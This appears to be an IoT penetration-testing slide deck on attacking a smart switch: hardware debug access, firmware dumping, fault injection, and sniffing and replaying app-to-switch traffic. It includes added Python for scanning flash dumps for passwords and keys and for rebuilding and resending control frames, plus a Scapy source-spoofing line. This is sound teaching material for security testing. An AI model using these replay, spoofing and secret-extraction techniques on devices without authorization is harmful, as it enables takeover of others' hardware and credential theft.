4. Attack Surfaces on IoT
● Hardware Level
● Software Level
● Communication Protocol Analysis
5. Hardware Level Attack Vectors
● Hardware Level
○ Gaining a shell via debug points
■ Identifying the communication points (Tx, Rx)
○ Dumping the firmware from the memory chip
■ De-solder the flash chip and read its contents out with an external programmer
○ Fault Injection
■ Voltage/Clock Glitching
■ Optical Fault Injection
■ Electromagnetic Fault Injection
6. Software Level Attack Vectors
● Software Level
○ Extracting sensitive information from the firmware
○ Modifying the firmware
○ Flashing the modified (malicious) firmware back onto the device
○ Gaining a shell via default credentials
○ Emulating the firmware
○ Hooking functions to understand the logic
7. Communication Attack Surface
● Communication Level
○ Sniffing
○ Injection attack
○ Fuzzing the protocol
○ Replay Attack
○ MiTM
9. Pentester’s Approach
● Understanding the Architecture
● Identifying the attack vectors on the Smart switch
● Observing Hardware details
● Extracting Firmware from the chip
● Analyzing the firmware for the sensitive information
● Getting into the network
● Understanding the communication
● Duplicating the communication and controlling the switch
10. Hardware Level - Identifying the Hardware details
● Open the IoT device hardware
● Identify each component
● Identify the ways to communicate with chip
● Identify the model of the CPU and of the SPI flash chip
● Download the datasheets for the CPU and the flash chip to learn how to communicate with them (pinout, bus protocol, read commands)
11. Download the firmware via onboard pins
● Identify the on-board pins used to communicate with the CPU
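The steps on slides 9 to 11 (read the flash, then analyse the dump for sensitive information) can be checked with a short script. This is an added example, not code from the original deck: it assumes the chip was read twice with an external programmer (for instance `flashrom -p ch341a_spi -r dump1.bin`) so the two reads can be compared, then does a minimal signature scan and a strings-based secret search. The sample image, the strings in it and the hash value are constructed for the demonstration and do not come from a real device.

```python
"""Sanity-check an SPI flash dump and triage it for sensitive material.

Added example, not from the original slides. Assumes two reads of the same
chip are available for comparison; the sample image below is constructed.
"""
import hashlib
import re

# Magic bytes that usually mark a firmware container or embedded filesystem.
# A dump with none of them is suspect: wrong chip, bad wiring, or an encrypted image.
SIGNATURES = {
    b"\x27\x05\x19\x56": "uImage (U-Boot) header",
    b"hsqs": "SquashFS, little-endian",
    b"sqsh": "SquashFS, big-endian",
    b"\x1f\x8b\x08": "gzip stream",
    b"HDR0": "Broadcom TRX header",
}

# Strings worth flagging during firmware triage.
SECRET_PATTERNS = [
    re.compile(rb"(?i)(pass(word|wd)?|pwd|secret|token)\s*[=:]\s*\S+"),  # config keys
    re.compile(rb"^[a-z_][a-z0-9_-]*:\$[0-9a-z]+\$[^:]*:"),            # passwd/shadow hash
    re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----"),                 # embedded key
]


def sha256_hex(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()


def dumps_match(first: bytes, second: bytes) -> bool:
    """Two reads of the same chip must hash identically; otherwise wiring or clock is flaky."""
    return sha256_hex(first) == sha256_hex(second)


def erased_fraction(blob: bytes) -> float:
    """Share of 0xFF bytes. Close to 1.0 means an erased chip or a read that never reached it."""
    return blob.count(0xFF) / len(blob) if blob else 1.0


def find_signatures(blob: bytes) -> list:
    """Offsets of known magics, sorted by offset (a minimal binwalk-style scan)."""
    hits = []
    for magic, name in SIGNATURES.items():
        start = 0
        while (pos := blob.find(magic, start)) != -1:
            hits.append((pos, name))
            start = pos + 1
    return sorted(hits)


def printable_strings(blob: bytes, min_len: int = 8) -> list:
    """Runs of printable ASCII, like the `strings` tool."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)


def find_secrets(blob: bytes) -> list:
    """Printable strings that match one of SECRET_PATTERNS."""
    found = []
    for s in printable_strings(blob):
        if any(p.search(s) for p in SECRET_PATTERNS):
            found.append(s.decode("ascii"))
    return found


def build_sample_dump() -> bytes:
    """Constructed 4 KiB image for demonstration only; every value is invented."""
    img = bytearray(b"\xff" * 0x1000)                 # erased flash reads as 0xFF
    img[0x000:0x004] = b"\x27\x05\x19\x56"            # uImage header at offset 0
    img[0x020:0x040] = b"Linux-3.10.14 smartswitch".ljust(0x20, b"\x00")
    img[0x400:0xC00] = b"\x00" * 0x800                # rootfs region (non-erased data)
    img[0x400:0x404] = b"hsqs"                        # SquashFS starts at 1 KiB
    for off, s in (
        (0x500, b"root:$1$yZ3r9k1n$AbCdEfGhIjKlMnOpQrStU.:0:0:root:/root:/bin/sh"),
        (0x580, b"wifi_password=SuperSecret99"),
        (0x600, b"-----BEGIN RSA PRIVATE KEY-----"),
        (0x680, b"Copyright (c) Example Vendor"),     # benign, must not be flagged
    ):
        img[off:off + len(s)] = s
    return bytes(img)


if __name__ == "__main__":
    dump = build_sample_dump()
    print("sha256:", sha256_hex(dump))
    print("erased fraction: %.2f" % erased_fraction(dump))
    for off, name in find_signatures(dump):
        print("0x%06x  %s" % (off, name))
    for s in find_secrets(dump):
        print("secret:", s)
```

Run it on two real dumps by replacing `build_sample_dump()` with `open(path, "rb").read()` for each file: if `dumps_match` is false, re-seat the clip or lower the programmer's SPI clock before trusting either image; if `erased_fraction` is near 1.0 the read never reached the die. Anything `find_signatures` reports is a candidate offset for `binwalk -e` or `unsquashfs`.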
23. Communication Protocol Analysis
● Sniff the packets between the Mobile Application and Switch
● Create the duplicate request
● Send it to the Switch IP and check the status.
24. Packet Duplication
● Perform a MiTM attack to sniff the traffic between the application and the switch.
27. Alternative Ways
1. Use Frida to hook the exact function that creates the request
○ Helps in understanding the encryption logic
○ Control other switches
2. Use Scapy to craft network packets and send them to the switch
○ Understand the packet structure
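The flow on slides 23, 24 and 27 (sniff a request, rebuild a duplicate, send it to the switch and check the status) is shown below as an added example that is not part of the original deck. The frame layout is hypothetical, chosen for illustration only: magic, version, command, sequence number, relay id, state and a CRC-16 trailer. A real switch's format has to be recovered from the sniffed traffic first, and the control port `5000` is likewise an assumption. The "captured" frame is constructed inline rather than taken from a real capture.

```python
"""Parse, duplicate and re-send an app-to-switch control frame.

Added example, not from the original slides. The frame layout, the command
codes and the port are hypothetical; the captured frame is constructed.
"""
import socket
import struct
import sys

MAGIC = b"SW"
VERSION = 1
CMD_SET_RELAY = 0x10
CMD_GET_STATE = 0x11
HEADER = struct.Struct(">2sBBHBB")   # magic, version, cmd, seq, relay_id, state
FRAME_LEN = HEADER.size + 2          # header + CRC-16 trailer
DEFAULT_PORT = 5000                  # hypothetical control port


def crc16_ccitt(data: bytes, crc: int = 0xFFFF) -> int:
    """CRC-16/CCITT-FALSE (poly 0x1021, init 0xFFFF); b'123456789' -> 0x29B1."""
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) & 0xFFFF if crc & 0x8000 else (crc << 1) & 0xFFFF
    return crc


def build_frame(cmd: int, seq: int, relay_id: int, state: int) -> bytes:
    body = HEADER.pack(MAGIC, VERSION, cmd, seq & 0xFFFF, relay_id, state)
    return body + struct.pack(">H", crc16_ccitt(body))


def parse_frame(raw: bytes) -> dict:
    """Validate length, CRC and magic, then return the fields."""
    if len(raw) != FRAME_LEN:
        raise ValueError("unexpected frame length %d" % len(raw))
    body, (crc,) = raw[:-2], struct.unpack(">H", raw[-2:])
    if crc16_ccitt(body) != crc:
        raise ValueError("CRC mismatch: bytes edited without recomputing the trailer?")
    magic, version, cmd, seq, relay_id, state = HEADER.unpack(body)
    if magic != MAGIC:
        raise ValueError("bad magic %r" % magic)
    return {"version": version, "cmd": cmd, "seq": seq, "relay_id": relay_id, "state": state}


def duplicate_frame(captured: bytes, relay_id=None, state=None, bump_seq=True) -> bytes:
    """Rebuild a sniffed frame, optionally retargeting it, with a fresh CRC.

    bump_seq=True assumes the switch rejects a repeated sequence number; a
    plain replay uses bump_seq=False and yields the captured bytes unchanged.
    """
    f = parse_frame(captured)
    return build_frame(
        f["cmd"],
        f["seq"] + (1 if bump_seq else 0),
        f["relay_id"] if relay_id is None else relay_id,
        f["state"] if state is None else state,
    )


def send_frame(frame: bytes, switch_ip: str, port: int = DEFAULT_PORT, timeout: float = 2.0):
    """Send one UDP frame to the switch and return its reply (None on timeout)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(frame, (switch_ip, port))
        try:
            reply, _ = sock.recvfrom(64)
        except socket.timeout:
            return None
    return reply


# Stand-in for a frame sniffed from the mobile app: "set relay 1 ON", seq 0x0102.
CAPTURED = build_frame(CMD_SET_RELAY, 0x0102, 1, 1)

if __name__ == "__main__":
    print("captured:", CAPTURED.hex(), parse_frame(CAPTURED))
    off = duplicate_frame(CAPTURED, state=0)
    print("duplicate (relay OFF):", off.hex(), parse_frame(off))
    if len(sys.argv) > 1:                      # python script.py <switch-ip>
        reply = send_frame(off, sys.argv[1])
        print("reply:", None if reply is None else reply.hex())
```

The CRC check in `parse_frame` is the caveat a practitioner runs into first: flipping the state byte of a sniffed packet and resending it is silently dropped by any device that validates a checksum, so the duplicate has to be rebuilt rather than patched. If the real protocol has no checksum or counter, a raw replay of the captured bytes is enough. The same payload can be sent with Scapy as `send(IP(dst=switch_ip)/UDP(dport=port)/Raw(load=frame))` when you also want to spoof the source address of the phone.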